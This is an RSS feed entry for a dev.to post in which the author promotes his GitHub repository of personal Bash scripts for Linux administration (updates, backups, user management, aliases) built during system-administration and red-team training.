      <dc:creator>Seif Eldien Ahmad Mohammad</dc:creator>
      <pubDate>Wed, 30 Jul 2025 22:24:22 +0000</pubDate>
      <link>https://dev.to/seifeldienahmad/-my-personal-bash-scripts-repository-on-github-101o</link>
      <guid>https://dev.to/seifeldienahmad/-my-personal-bash-scripts-repository-on-github-101o</guid>
      <description>&lt;p&gt;Hey Devs! 👋&lt;br&gt;&lt;br&gt;
I've created a GitHub repo that includes all the Bash scripts I’m using and learning from during my Linux administration and cybersecurity training.&lt;/p&gt;

&lt;p&gt;🔗 &lt;em&gt;Repo Link&lt;/em&gt;: &lt;a href="https://github.com/SeifEldienAhmad/BashScripts" rel="noopener noreferrer"&gt;github.com/SeifEldienAhmad/BashScripts&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  ✅ What’s inside?
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Update automation scripts&lt;/li&gt;
&lt;li&gt;Backup utilities&lt;/li&gt;
&lt;li&gt;User and permission management&lt;/li&gt;
&lt;li&gt;Aliases and shortcuts&lt;/li&gt;
&lt;li&gt;Scripts that I personally use and test&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;💡 Feel free to clone, fork, or contribute if you'd like!&lt;/p&gt;

&lt;p&gt;🔄 I'll be adding more as I go through RHSA and my Red Team learning roadmap.&lt;/p&gt;

&lt;h2&gt;
  
  
  🟢 &lt;strong&gt;👉 Ready to explore? &lt;a href="https://github.com/SeifEldienAhmad/BashScripts" rel="noopener noreferrer"&gt;Check out the repo now »&lt;/a&gt;&lt;/strong&gt;
&lt;/h2&gt;

&lt;p&gt;Author: &lt;em&gt;Seif Eldien Ahmad Mohammad&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Other name variations I go by (for SEO and clarity):&lt;br&gt;&lt;br&gt;
SeifEldien, Seif Eldein, Seif Eldien, Seif Ahmad&lt;/p&gt;

&lt;p&gt;✅ Official GitHub &amp;amp; tech content published under:&lt;br&gt;&lt;br&gt;
&lt;em&gt;Seif Eldien Ahmad Mohammad&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  🔗 GitHub: &lt;a href="https://github.com/SeifEldienAhmad" rel="noopener noreferrer"&gt;github.com/SeifEldienAhmad&lt;/a&gt;
&lt;/h2&gt;

</description>
      <category>bash</category>
      <category>linux</category>
      <category>cybersecurity</category>
      <category>shellscripting</category>
    </item>
  </channel>
</rss>
